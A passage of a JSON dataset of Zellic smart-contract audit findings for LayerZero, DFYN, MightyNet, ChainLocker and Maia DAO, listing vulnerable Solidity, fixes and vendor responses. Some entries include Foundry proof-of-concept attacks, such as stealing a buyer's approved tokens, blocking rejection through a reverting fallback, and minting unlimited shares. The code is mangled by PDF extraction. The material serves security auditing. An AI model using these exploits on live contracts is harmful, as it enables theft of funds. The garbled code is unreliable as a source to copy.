both the admin and OApp independently configure specific values as the OApp and default configu- rations. Enforce function requirements during the getUlnConfig call. Then, call getUlnConfig() after changing any configurations. This issue has been acknowledged by LayerZero Labs, and a fix was implemented in commit 3dfec105. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.10 Signature verification ecrecover is missing error condition check", + "labels": [ + "Zellic" + ], + "body": "Target: MultiSig, MultiSigUpgradeable Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The ecrecover call in the following function recovers the signer adress from the sig- nature components: function verifySignatures(bytes32 _hash, bytes calldata _signatures) public view returns (bool) { if (_signatures.length !) uint(quorum) * 65) { return false; } bytes32 messageDigest = _getEthSignedMessageHash(_hash); address lastSigner = address(0); /) There cannot be a signer with address 0. for (uint i = 0; i < quorum; i+)) { (uint8 v, bytes32 r, bytes32 s) = _splitSignature(_signatures, i); address currentSigner = ecrecover(messageDigest, v, r, s); if (currentSigner <) lastSigner) return false; /) prevent duplicate signatures if (!signers[currentSigner]) return false; /) signature is not from a signer lastSigner = currentSigner; } return true; } Per the Solidity documentation, the ecrecover built-in function returns zero on error: ... recover the address associated with the public key from elliptic curve signature or return zero on error. Zellic LayerZero Labs The duplicate signer check ensures zero is not a valid signer address. However, the error condition is not explicitly checked. We recommend checking the return value to ensure it is nonzero. /) [...))] address lastSigner = address(0); /) There cannot be a signer with address 0. for (uint i = 0; i < quorum; i+)) { (uint8 v, bytes32 r, bytes32 s) = _splitSignature(_signatures, i); address currentSigner = ecrecover(messageDigest, v, r, s); require(currentSigner !) 0); if (currentSigner <) lastSigner) return false; /) prevent duplicate signatures if (!signers[currentSigner]) return false; /) signature is not from a signer lastSigner = currentSigner; } /) [...))] This issue has been acknowledged by LayerZero Labs. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "4.11 Unnecessary caller restriction on execute function", + "labels": [ + "Zellic" + ], + "body": "Target: VerifierNetwork Category: Business Logic Likelihood: Low Severity: Medium : Low The execute function restricts the caller to those with the admin role only: function execute(ExecuteParam[] calldata _params) external onlyRole(ADMIN_ROLE) { for (uint i = 0; i < _params.length; +)i) { ExecuteParam calldata param = _params[i]; /) 1. skip if expired if (param.expiration <) block.timestamp) { continue; } /) generate and validate hash bytes32 hash = hashCallData(param.target, param.callData, param.expiration); /) 2. skip if hash used bool shouldCheckHash = _shouldCheckHash(bytes4(param.callData)); if (shouldCheckHash &) usedHashes[hash]) { emit HashAlreadyUsed(param, hash); continue; } /) 3. check signatures if (verifySignatures(hash, param.signatures)) { /) execute call data (bool success, bytes memory rtnData) = param.target.call(param.callData); if (success) { if (shouldCheckHash) { /) store usedHash only on success usedHashes[hash] = true; /) prevent reentry and replay attack } } else { emit ExecuteFailed(i, rtnData); } Zellic LayerZero Labs } } } However, this restriction is unnecessary because the function requires a quorum of valid signatures. If an admin were to fail to call the execute function for any reason, the ULN would not deliver any messages to the endpoint, even if all of the signers were online. The function should be able to be called permissionlessly to ensure the signatures may always be submitted. This issue has been acknowledged by LayerZero Labs. Zellic LayerZero Labs", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Endpoint V2 - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Same token swap is allowed", + "labels": [ + "Zellic" + ], + "body": "Target: DfynRFQ Category: Business Logic Likelihood: Medium Severity: Low : Low A user might mistakenly perform a same-token swap via the protocol, since there are no restrictions against that. In function _swap() there are no checks whatsoever for whether the tokens[0] and tokens[1] are identical. function _swap( address custodian, address[] calldata tokens, uint256[] calldata amounts, uint64 deadline, bytes calldata signature ) internal onlyWhitelisted(custodian) returns (bool) { Swap memory swap = Swap({ user: msg.sender, custodian: custodian, token0: tokens[0], token1: tokens[1], amount0: amounts[0], amount1: amounts[1], deadline: deadline, nonce: nonces[msg.sender], chainId: chainId }); require(block.timestamp < swap.deadline, \u201cExpired Order\u201d); require(verify(swap, signature), \u201cInvalid Signer\u201d); require(swap.amount1 > 0 &) swap.amount0 > 0, \u201camount !) 0\u201d); Zellic Router Protocol This can lead to loss of the gas cost used in the transaction, as well as the tokens lost to protocol fees, all due to an undesireable action performed by the user in the first place. We recommend adding an additional check when performing a swap, such that the tokens on either side of the swap are not the same. function _swap( address custodian, address[] calldata tokens, uint256[] calldata amounts, uint64 deadline, bytes calldata signature ) internal onlyWhitelisted(custodian) returns (bool) { require(tokens[0] !) tokens[1], \u201cSame token swap is disallowed\u201d); Swap memory swap = Swap({ user: msg.sender, custodian: custodian, token0: tokens[0], token1: tokens[1], amount0: amounts[0], amount1: amounts[1], deadline: deadline, nonce: nonces[msg.sender], chainId: chainId }); require(block.timestamp < swap.deadline, \u201cExpired Order\u201d); require(verify(swap, signature), \u201cInvalid Signer\u201d); require(swap.amount1 > 0 &) swap.amount0 > 0, \u201camount !) 0\u201d); This issue has been acknowledged by the Router team and mitigated in commit 3be1183. Zellic Router Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/DFYN RFQ - Zellic Audit Report.pdf" + }, + { + "title": "3.2 DfynRFQ provides a function to renounce ownership", + "labels": [ + "Zellic" + ], + "body": "Target: DfynRFQ Category: Business Logic Likelihood: N/A Severity: Informational : Informational The DfynRFQ contract implements Ownable functionality, which provides a method named renounceOwnership that removes the current owner. This is likely not a de- sired feature. If renounceOwnership were called, the contract would be left without an owner. Override the renounceOwnership function: function renounceOwnership() public override onlyOwner{ revert(\u201cThis feature is not available.\u201d); } This issue has been mitigated by the Router team in commit 3be1183. Zellic Router Protocol", + "html_url": "https://github.com/Zellic/publications/blob/master/DFYN RFQ - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Risk of unintended token minting", + "labels": [ + "Zellic" + ], + "body": "Target: MightyNetERC1155Claimer Category: Business Logic Likelihood: Medium Severity: High : High The leaf nodes of the Merkle tree contain only the user addresses and do not include the tokenId or the address of mnERC1155 to be minted. As a result, a user can potentially use a Merkle proof expected for minting tokens with tokenId x to mint tokens with t okenId y, or even mint tokens on an entirely different mnERC1155 contract. Here is an example. In this scenario, we will consider tokenId y to be more valuable than tokenId x, and the claimWhitelist array contains a Merkle root where the user is eligible to mint n number of tokens with tokenId x. The potential issue arises from the fact that even though it might be expected for the user to call claim using the correct Merkle proof to mint their x tokens, they might choose not to do so and instead wait for the admin to change the tokenId using the function setTokenId. If the admin later changes the tokenId from x to y, the user can now simply call claim to claim n number of y tokens instead of x tokens. This behavior could lead to unintended economic consequences, as the user could take advantage of the situation to obtain more valuable y tokens rather than the orig- inally intended x tokens. If either setTokenId or setMightyNetERC1155Address is called to change the tokenId or m nERC1155 address before all the tokens are claimed, and the claimWhitelist is not fully cleared out, it could potentially result in the minting of different tokens than originally expected. To address this issue, it is recommended to ensure that claimWhitelist is completely cleared out before invoking setTokenId or setMightyNetERC1155Address. By doing so, any potential misuse of old Merkle proofs to mint new tokens can be prevented. Al- ternatively, you can consider including the tokenId and the address of ERC-1155 in the Zellic Mighty Bear Games Merkle trees, which can also help mitigate the problem. This issue has been acknowledged by Mighty Bear Games. Mighty Bear Games provided the following response: We acknowledge the concerns related to the possibility of unintended token minting. However, it\u2019s important to note that this contract is designed for a spe- cific use case, where only one item from one collection can be claimed. We assure you that we will not reuse the same contract for multiple claim or mint events. Instead, for each new event, a fresh contract will be deployed. The reason for implementing the SetTokenId function is to maximize flexibility in case we encounter any misconfigurations or issues after deployment. Should any problems arise, we will be able to pause the contract, make the necessary adjustments, and then resume its functionality. Zellic Mighty Bear Games", + "html_url": "https://github.com/Zellic/publications/blob/master/MightyNetERC1155Claimer - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Possible DOS while claiming ERC-1155", + "labels": [ + "Zellic" + ], + "body": "Target: MightyNetERC1155Claimer Category: Business Logic Likelihood: Medium Severity: Medium : Medium The claimWhitelist array stores the MerkleProofWhitelist struct containing the root hash of the Merkle tree. Each element in the array corresponds to a specific number of claimable tokens, and the Merkle tree contains addresses eligible to mint that number of tokens. If this array is large enough, the users that have a large amount of claimable tokens would need to spend too much gas to claim their tokens or the function claim might entirely revert for them due to exceeding the gas limit, as the code loops through the dynamic array. function claim(bytes32[] calldata merkleProof){ ...)) uint256 size = claimWhitelist.length; bool whitelisted = false; uint256 toMint = 0; for (; toMint < size; +)toMint) { if (claimWhitelist[toMint].isWhitelisted(msg.sender, merkleProof)) { whitelisted = true; break; } } ...)) } The transaction might fail if the claimWhitelist array becomes too large and the gas exceeds the maximum gas limit. Additionally, users with a substantial number of claimable tokens would be required to spend a significant amount of gas to exe- cute the transaction successfully. This gas consumption can become burdensome for users with a large number of tokens to claim. Zellic Mighty Bear Games Consider modifying the claim function to accept the mint amount as an argument and use it directly to calculate the array index where isWhitelisted should be called. This adjustment can improve the efficiency of the function and avoid unnecessary itera- tions through the claimWhitelist array, especially in scenarios with a large number of claimable tokens. This issue has been acknowledged by Mighty Bear Games. Mighty Bear Games provided the following response: We have assessed the gas costs associated with claiming different amounts of ERC-1155 tokens, and our findings indicate that the increase in cost follows a lin- ear pattern. We have taken this into consideration while designing the claiming process. Additionally, it is important to note that we have set a limit on the max- imum number of tokens that can be claimed to just 3. Zellic Mighty Bear Games", + "html_url": "https://github.com/Zellic/publications/blob/master/MightyNetERC1155Claimer - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Potential funds loss for buyers upon approval", + "labels": [ + "Zellic" + ], + "body": "Target: TokenLocker Category: Business Logic Likelihood: High Severity: Critical : Critical When depositing tokens into the TokenLocker contract, it is essential for the buyer to grant approval beforehand to the TokenLocker contract, a step necessary for invoking the depositTokens function. The function depositTokens takes in an address _deposit or and transfers the tokens from this _depositor address to the TokenLocker contract. function depositTokens( address _depositor, uint256 _amount ) external nonReentrant { uint256 _balance = erc20.balanceOf(address(this)) + _amount; if (_balance > totalAmount) revert TokenLocker_BalanceExceedsTotalAmount(); if (!openOffer &) _depositor !) buyer) revert TokenLocker_NotBuyer(); if (erc20.allowance(_depositor, address(this)) < _amount) revert TokenLocker_AmountNotApprovedForTransferFrom(); if (expirationTime <) block.timestamp) revert TokenLocker_IsExpired(); if (_balance >) deposit &) !deposited) { /) if this TokenLocker is an open offer and was not yet accepted (thus '!deposited'), make depositing address the 'buyer' and update 'deposited' to true if (openOffer) { buyer = _depositor; emit TokenLocker_BuyerUpdated(_depositor); } deposited = true; emit TokenLocker_DepositInEscrow(_depositor); Zellic ChainLocker LLC } if (_balance =) totalAmount) emit TokenLocker_TotalAmountInEscrow(); emit TokenLocker_AmountReceived(_amount); amountDeposited[_depositor] += _amount; safeTransferFrom(tokenContract, _depositor, address(this), _amount); } This situation opens a potential vulnerability. Under certain circumstances, a seller could be enticed to exploit this loophole. They might opt to trigger the depositToke ns function using the buyer\u2019s address, assuming that the buyer had already granted approval to the TokenLocker contract. The vulnerability can be demonstrated using the following Foundry test code: function testtokenstealfrombuyer() public{ vm.label(buyer,\u201dbuyer\u201d); vm.label(seller,\u201dseller\u201d); testToken.mintToken(buyer, 20 ether); testToken.mintToken(seller, 1); console.log(\u201dBalance of buyer before attack\u201d,testToken.balanceOf(address(buyer))); console.log(\u201dBalance of seller before attack\u201d,testToken.balanceOf(address(seller))); openEscrowTest = new TokenLocker( true, true, 0, 0, 0, 10 ether, 20 ether, expirationTime, seller, buyer, testTokenAddr, address(0) ); Zellic ChainLocker LLC vm.prank(buyer); testToken.approve(address(openEscrowTest), 20 ether); vm.startPrank(seller); openEscrowTest.depositTokens(address(buyer),openEscrowTest.deposit() - 1); testToken.approve(address(openEscrowTest), 1); openEscrowTest.depositTokens(address(seller),1); openEscrowTest.depositTokens(address(buyer),openEscrowTest.totalAmount() - openEscrowTest.deposit()); vm.stopPrank(); vm.warp(block.timestamp + expirationTime); openEscrowTest.checkIfExpired(); console.log(\u201dBalance of buyer after attack\u201d,testToken.balanceOf(address(buyer))); console.log(\u201dBalance of seller after attack\u201d,testToken.balanceOf(address(seller))); } Sellers might be able to steal tokens from the buyers in case approval to the Token- Locker contract is provided. It is recommended to check if msg.sender is actually the _depositor in the depositTok ens call. ChainLocker LLC acknowledged this finding and implemented a fix in commit 8af9f1e6 Zellic ChainLocker LLC", + "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The function updateBuyer does not update the amountDepos ited mapping", + "labels": [ + "Zellic" + ], + "body": "Target: TokenLocker, EthLocker Category: Business Logic Likelihood: Medium Severity: Critical : High If the buyer global variable is set, the buyer can update the current buyer to a new address using the function updateBuyer. Updating the buyer using this function does not update the amountDeposited mapping. In case a buyer updates this address to a new buyer address, the seller could reject the old buyer using the rejectDepositor function to set the buyer to address(0) and deposited to false without returning any tokens. They can then deposit tokens in the locker themselves to become the new buyer and wait until expirationTime has passed to steal these tokens. The vulnerability can be demonstrated using the following Foundry test code: function teststealfrombuyer() public{ address buyer1 = vm.addr(0x1337); address buyer2 = vm.addr(0x1338); address seller1 = vm.addr(0x1339); vm.label(buyer1,\u201dbuyer1\u201d); vm.label(buyer2,\u201dbuyer2\u201d); vm.label(seller1,\u201dseller1\u201d); vm.deal(buyer1, 10 ether); vm.deal(seller1, 1 ether); console.log(\u201dBalance of seller before attack\u201d,seller1.balance); openEscrowTest = new EthLocker( true, true, 0, 0, 0, 10 ether, 20 ether, expirationTime, payable(seller1), buyer, Zellic ChainLocker LLC address(0) ); address payable _newContract = payable(address(openEscrowTest)); vm.startPrank(buyer1); (bool _success, ) = _newContract.call{value: 10 ether}(\u201d\u201d); openEscrowTest.updateBuyer(payable(buyer2)); vm.stopPrank(); vm.startPrank(seller1); openEscrowTest.rejectDepositor(payable(buyer2)); (_success, ) = _newContract.call{value: 1 ether}(\u201d\u201d); vm.warp(block.timestamp + expirationTime); openEscrowTest.checkIfExpired(); console.log(\u201dBalance of seller after attack\u201d,seller1.balance); } A seller can steal the tokens deposited by the buyers if the buyers update their address using the updateBuyer function. Correctly update the mapping amountDeposited by moving the value stored from the previous buyer to the new buyer. ChainLocker LLC acknowledged this finding and implemented a fix in commits 7d5c0a23 , 9ebb93f8 , 78339ea0 , 7aa15e05 , e18f2732 and 142300b6 Zellic ChainLocker LLC", + "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Buyers can prevent themselves from being rejected", + "labels": [ + "Zellic" + ], + "body": "Target: TokenLocker, EthLocker Category: Business Logic Likelihood: High Severity: High : High Upon depositing funds into TokenLocker or EthLocker, the seller gains the ability to decline the depositor\u2019s request, leading to a refund of the deposited amount via the rejectDepositor function. This function internally triggers either safeTransferETH or safeTransfer, depending on whether it is being called from EthLocker or TokenLocker, respectively. In the case of EthLocker, an issue arises when safeTransferETH is called, as it would internally call the fallback function if a buyer is a contract; the buyer can purposefully call revert in the fallback function, causing the entire call to be reverted. Thus, a buyer can prevent themselves from being rejected by the seller. Following is the code of the rejectDepositor function: function rejectDepositor(address payable _depositor) external nonReentrant { if (msg.sender !) seller) revert EthLocker_NotSeller(); if (!openOffer) revert EthLocker_OnlyOpenOffer(); /) reset 'deposited' and 'buyer' variables if 'seller' passed 'buyer' as '_depositor' if (_depositor =) buyer) { delete deposited; delete buyer; emit EthLocker_BuyerUpdated(address(0)); } uint256 _depositAmount = amountDeposited[_depositor]; /) regardless of whether '_depositor' is 'buyer', if the address has a positive deposited balance, return it to them if (_depositAmount > 0) { delete amountDeposited[_depositor]; safeTransferETH(_depositor, _depositAmount); emit EthLocker_DepositedAmountTransferred( _depositor, _depositAmount ); Zellic ChainLocker LLC } } The vulnerability can be demonstrated using the following Foundry test code: function testfakebuyerrejection() public{ fakebuyer fakebuyer1 = new fakebuyer(); address seller1 = vm.addr(0x1339); vm.deal(address(fakebuyer1), 10 ether); vm.deal(seller1, 10 ether); openEscrowTest = new EthLocker( true, true, 0, 0, 0, 10 ether, 20 ether, expirationTime, payable(seller1), buyer, address(0) ); address payable _newContract = payable(address(openEscrowTest)); vm.prank(address(fakebuyer1)); (bool _success, ) = _newContract.call{value: 10 ether}(\u201d\u201d); vm.startPrank(seller1); openEscrowTest.rejectDepositor(payable(fakebuyer1)); /) This call would revert. } /) The fake buyer contract contract fakebuyer{ constructor() {} fallback() payable external { revert(); } } Zellic ChainLocker LLC A similar issue arises in TokenLocker if any ERC-777/ERC-677 (extensions of ERC-20) tokens are used, as the buyer can revert during the callback of the safeTransfer call and prevent themselves from being rejected. Buyers can prevent themselves from being rejected by the seller. Implement a shift from the push method to the pull pattern. In other words, rather than executing fund transfers within the rejectDepositor function, it is possible to adopt a mechanism where a mapping is updated for the depositor that would indicate the amount of funds they are authorized to withdraw. Subsequently, the depositor can engage a distinct function that leverages this mapping to execute the fund transfer to themselves. This approach ensures that a buyer\u2019s actions cannot obstruct the reject Depositor call. ChainLocker LLC acknowledged this finding and implemented a fix in commits fe6a23a4 , 78339ea0, 2c981487 and 142300b6 Zellic ChainLocker LLC", + "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Irrevertible loss of tokens", + "labels": [ + "Zellic" + ], + "body": "Target: TokenLocker, EthLocker Category: Business Logic Likelihood: Low Severity: High : Medium When a seller decides to reject a buyer, the designated buyer address is set to address (0). However, complications may arise in scenarios where a buyer employs different addresses to send tokens into the locker. In such cases, there is a possibility that residual tokens could remain within the contract without being fully returned to the buyer. In the event that the timestamp surpasses the defined expirationTime, a potentially malicious third party could cause an irreversible loss of tokens. By invoking the check IfExpired function, any remaining funds in the locker could be transferred to address (0). This action holds true in instances where the locker allows refunds. Yet, even in cases where the locker does not facilitate refunds, a substantial portion of funds might still be at risk of loss. Regardless of the circumstances, the outcome could involve an irreversible loss of tokens. The vulnerability can be demonstrated using the following Foundry test code: function testrejectandtokenloss() public { address buyer1 = vm.addr(0x1337); address buyer2 = vm.addr(0x1338); address seller1 = vm.addr(0x1339); vm.deal(buyer1, 10 ether); vm.deal(buyer2, 10 ether); vm.deal(seller1, 10 ether); openEscrowTest = new EthLocker( true, true, 0, 0, 0, 10 ether, 20 ether, expirationTime, payable(seller1), Zellic ChainLocker LLC buyer, address(0) ); address payable _newContract = payable(address(openEscrowTest)); vm.prank(buyer1); (bool _success, ) = _newContract.call{value: 5 ether}(\u201d\u201d); vm.prank(buyer2); (_success, ) = _newContract.call{value: 10 ether}(\u201d\u201d); vm.startPrank(seller1); openEscrowTest.rejectDepositor(payable(buyer2)); vm.warp(block.timestamp + expirationTime); openEscrowTest.checkIfExpired(); } There might be an irreversible loss of tokens. It is recommended to check the buyer address before transferring funds to it. ChainLocker LLC acknowledged this finding and implemented a fix in commits 6305b605 and df8d0003 Zellic ChainLocker LLC", + "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" + }, + { + "title": "3.5 The variable buyerApproved is not set to false if the buyer is rejected", + "labels": [ + "Zellic" + ], + "body": "Target: TokenLocker and EthLocker Category: Business Logic Likelihood: Medium Severity: Medium : Medium When a buyer is rejected by the seller, it is recommended to set the variable buyerAp proved to false. If not, the function execute is still callable, even if there is no buyer in the system. The function execute might be called even if there is no buyer. We recommend to set buyerApproved to false in rejectDepositor if _depositor =) bu yer. ChainLocker LLC acknowledged this finding and implemented a fix in commits ad330599 and 31904b2f Zellic ChainLocker LLC", + "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Griefing in checkIfExpired", + "labels": [ + "Zellic" + ], + "body": "Target: TokenLocker, EthLocker Category: Business Logic Likelihood: Medium Severity: Medium : Medium If a locker is nonrefundable and expirationTime has passed, it is possible to call check IfExpired to transfer the deposit amount to the seller and any remaining funds to the buyer. It is possible for the buyer or the seller to intentionally revert this transaction. The vulnerability here is similar to the one as shown in 3.3. In the case of EthLocker, an issue arises when safeTransferETH is called, as it would internally call the fallback function if the buyer/seller is a contract, and a buyer/seller can purposefully call revert in the fallback function, causing the entire call to be re- verted. A similar issue arises in TokenLocker if any ERC-777/ERC-677 (extensions of ERC-20) tokens are used, as the buyer/seller can revert during the callback of the safeTransfer call. Both the buyer and the seller possess the capability to impede the transfer of funds in checkIfExpired if the locker is nonrefundable. Implement a shift from the push method to the pull pattern as recommended in 3.3. ChainLocker LLC acknowledged this finding and implemented a fix in commits fe6a23a4 and 2c981487 Zellic ChainLocker LLC", + "html_url": "https://github.com/Zellic/publications/blob/master/ChainLocker - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Missing access control for Multicall", + "labels": [ + "Zellic" + ], + "body": "Target: MulticallRootRouter Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The function anyExecuteSignedDepositMultiple lacks the requiresAgent modifier, which makes it callable by anyone. function anyExecuteSignedDepositMultiple( bytes1 funcId, bytes memory rlpEncodedData, DepositMultipleParams calldata, address userAccount, uint24 fromChainId ) external payable returns (bool success, bytes memory result) {...))} Depending on the funcId, multiple things can happen, but IVirtualAccount(userAcco unt).call(calls) is always called on the userAccount input. If this is an actual VirtualAccount implementation, the call() function will revert, since it is protected by a requiresApprovedCaller modifier, and this approval is toggled on and off by RootBridgeAgent.sol calling IPort(localPortAddress).toggleVirtualAcco untApproved(...))) before and after the call to anyExecuteSignedDepositMultiple. An attacker can pick their own contract that pretends to be a VirtualAccount and make calls to, for example, call(...))) or withdrawERC20(...))) successful. This in itself is not helpful for an attacker, but for funcId 0x02 and 0x03, there are calls to the internal functions _approveAndCallOut(...))) and _approveMultipleAndCallOut( ...))). The attacker controls all parameters going into these functions. This ends up transferring tokens from Root to Branch, then sending or minting money to the re- ceiver. Using a fake VirtualAccount contract, a user can steal tokens from the Root by directly calling anyExecuteSignedDepositMultiple(...))). Note that this full chain is hard to ver- ify because it relies on several encoded structures and dependencies, so there is no proof of concept for this attack. Zellic Maia DAO Add a requiresAgent modifier to the anyExecuteSignedDepositMultiple function. This issue has been acknowledged by Maia DAO, and fixes were implemented in the following commits: ca057685 42c35522 Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Multitoken lacks validations", + "labels": [ + "Zellic" + ], + "body": "Target: ERC4626MultiToken Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Several functions within ERC4626MultiToken.sol lack necessary validations, which can result in the loss of funds or broken contracts. This contract is similar to the Solmate implementation of ERC4626, but it differs in that it allows for the trading of multiple (weighted) assets instead of just one. This is implemented by replacing the uint256 assets argument with a uint256[] memory assetsAmounts array. The deposit function calls multiple functions, each of which iterates based on the length of the assetsAmounts input array. However, this array is never checked to en- sure that it is equal to assets.length. The function then calculates the amount of shares by calling previewDeposit(assetsAmounts), which is a wrapper for convertToS hares. function convertToShares(uint256[] memory assetsAmounts) public view virtual returns (uint256 shares) { uint256 _totalWeights = totalWeights; uint256 length = assetsAmounts.length; shares = type(uint256).max; for (uint256 i = 0; i < length;) { uint256 share = assetsAmounts[i].mulDiv(_totalWeights, weights[i]); if (share < shares) shares = share; unchecked { i+); /) @audit +)i } } } Here, the shares variable is calculated based on the smallest possible share = asse tsAmounts[i] * _totalWeights / weights[i]. After this, the receiveAssets(assetsAm ounts) function is called to actually transfer the assets to the contract. However, if the assetsAmounts.length =) 0, shares will be type(uint256).max. Lastly, it mints the amount of shares and awards this to the receiver. Zellic Maia DAO Upon calling the redeem function, a user can present their shares and get back a mix of assets based on the weights, despite only depositing a subset of the assets (or none at all). Additionally, the constructor does not verify that weights are nonzero nor that the length of assets and weights are equal. A test case that proves this behavior was implemented inside UlyssesTokenHandler.t .sol, function test_poc_deposit() public virtual { address addr = 0xaAaAaAaaAaAaAaaAaAAAAAAAAaaaAaAaAaaAaaAa; uint[] memory assets; console.log(UlyssesToken(_vault_).deposit(assets, addr)); } where the output is Running 1 test for test/2-audit/ulysses- amm/UlyssesTokenTest.t.sol:InvariantUlyssesToken [PASS] test_poc_deposit() (gas: 62631) Logs: Test result: ok. 1 passed; 0 failed; finished in 1.19ms This shows that one can mint infinite shares without depositing any assets. If a zero-length assetsAmounts is allowed, users can obtain infinite shares for free. This lets them drain the contract. Since the lengths of assetsAmounts and assets are not synchronized, it is possible to add a single asset, get shares, then redeem multiple assets after. Since the lowest amount of shares is picked, a user that sends an uneven amount of tokens could get less shares than expected. This can be exacerbated by the weights changing before the transaction is included in the block, where there is no slippage protection parameter. For the constructor validation issues, the contract will break if one of the weights are zero, as it divides by the weight when withdrawing. Zellic Maia DAO Check that assetsAmounts and assets have the same length in every location and disal- low empty arrays where it can skip important loops. Add validation in the constructor to ensure that the contract cannot be initialized in a way that breaks functionality in the future. This issue has been acknowledged by Maia DAO, and a fix was implemented in com- mit df6b941b. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Multiple redeems of the same deposit are possible", + "labels": [ + "Zellic" + ], + "body": "Target: BranchBridgeAgent Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The redeemDeposit function currently allows any caller to initiate the withdrawal of a deposit that is in a Failed status. The caller has control over the associated _depositNo nce value, which includes information such as the hToken addresses and amounts, the underlying addresses and amounts of deposited tokens, and the owner of the deposit who will receive the funds. Once the funds have been successfully withdrawn, the deposit data is not reset or modified in any way, which means that it is possible to call the function again with the same identifier. function redeemDeposit(uint32 _depositNonce) external lock { /)Update Deposit if (getDeposit[_depositNonce].status !) DepositStatus.Failed) { revert DepositRedeemUnavailable(); } _redeemDeposit(_depositNonce); } function _redeemDeposit(uint32 _depositNonce) internal { /)Get Deposit Deposit storage deposit = _getDepositEntry(_depositNonce); /)Transfer token to depositor / user for (uint256 i = 0; i < deposit.hTokens.length;) { if (deposit.amounts[i] - deposit.deposits[i] > 0) { IPort(localPortAddress).bridgeIn( deposit.owner, deposit.hTokens[i], deposit.amounts[i] - deposit.deposits[i] ); } IPort(localPortAddress).withdraw(deposit.owner, deposit.tokens[i], deposit.deposits[i]); unchecked { Zellic Maia DAO +)i; } } IPort(localPortAddress).withdraw(deposit.owner, address(wrappedNativeToken), deposit.depositedGas); } If a cross-chain call fails, and the status of deposit will be set to Failed, the depositor will be able to withdraw all the _underlyingAddress tokens deposited to the localPor- tAddress contract. After a successful withdrawal, update the status of the deposit and reset the amounts of deposited funds or delete the deposit information from storage altogether. This will help prevent any repeated withdrawal of funds and ensure that the contract state accurately reflects the state of the deposits. This issue has been acknowledged by Maia DAO, and a fix was implemented in com- mit a0dd0311. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Broken fee sweep", + "labels": [ + "Zellic" + ], + "body": "Target: RootBridgeAgent Category: Coding Mistakes Likelihood: High Severity: High : Critical Whenever execution gas is paid in _payExecutionGas(...))), a fee is taken and stored in the global accumulatedFees. To withdraw these fees, the function sweep() is called by the designated daoAddress, and the fees are then supposed to be reset afterwards. function sweep() external { if (msg.sender !) daoAddress) revert UnauthorizedCaller(); accumulatedFees = 0; SafeTransferLib.safeTransferETH(daoAddress, accumulatedFees); } However, accumulatedFees is reset before the token transfer. Fees are stuck in the RootBridgeAgent. It is impossible to extract these from the con- tract. Move the accumulatedFees reset below the transfer call, but also consider the need for reentrancy guards. A temporary variable was introduced to mirror the accumulated fees, and the global is still reset before the transfer to avoid reentrancy guards. This issue has been ac- knowledged by Maia DAO, and a fix was implemented in commit 23c47122. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Asset removal is broken", + "labels": [ + "Zellic" + ], + "body": "Target: UlyssesToken.sol Category: Coding Mistakes Likelihood: High Severity: High : High The function removeAsset(address asset) removes an asset from the global assets[] and weights[] arrays and updates some globals. function removeAsset(address asset) external nonReentrant onlyOwner { /) No need to check if index is 0, it will underflow and revert if it is 0 uint256 assetIndex = assetId[asset] - 1; if (assets.length =) 1) revert CannotRemoveLastAsset(); /) Remove asset from array for (uint256 i = assetIndex; i < assets.length; i+)) { assets[i] = assets[i + 1]; weights[i] = weights[i + 1]; } totalWeights -= weights[assetIndex]; assets.pop(); weights.pop(); assetId[asset] = 0; ...)) } This is done by looking up the index of the asset in assetId, then moving all assets and weights down by one index. Finally, totalweights is supposed to be reduced by the weight of the removed asset, and the duplicated value at the end is popped off. However, there are multiple issues with this implementation. The loop increments i to assets.length but indexes into i+1, which will go be- yond the length of the array and revert. Global totalWeights is reduced after the target asset and weight has been over- written, reducing the totalWeights by a different weight than intended. Zellic Maia DAO The assetId mapping is supposed to point to the index of a given asset, but these indices ares not updated when all the positions shift around. While not unsolveable, adding too many assets can make it impossible to re- move one of the lower-index assets due to gas cost. Removing higher-index assets would be possible still, and multiple such operations could reduce the gas cost for a lower index too. It is impossible to remove assets. Even if it worked, the weights would be wrong after removing an asset. Due to assetId not updating, removing an asset in the future will remove the wrong asset \u2014 or cause the transaction to revert. Loop to assets.length-1. Update totalWeights before removing the weights. Update the assetId mapping. Create test cases for the function. This issue has been acknowledged by Maia DAO, and fixes were implemented in the following commits: 3d317ac6 f116e00e Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO Ulysses Protocol May 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Unsupported function codes", + "labels": [ + "Zellic" + ], + "body": "Target: CoreBranchRouter Category: Coding Mistakes Likelihood: High Severity: High : High Several functions from CoreBranchRouter perform an external call to IBridgeAgent(l ocalBridgeAgentAddress).performSystemCallOut; below is an example of this kind of call. The data 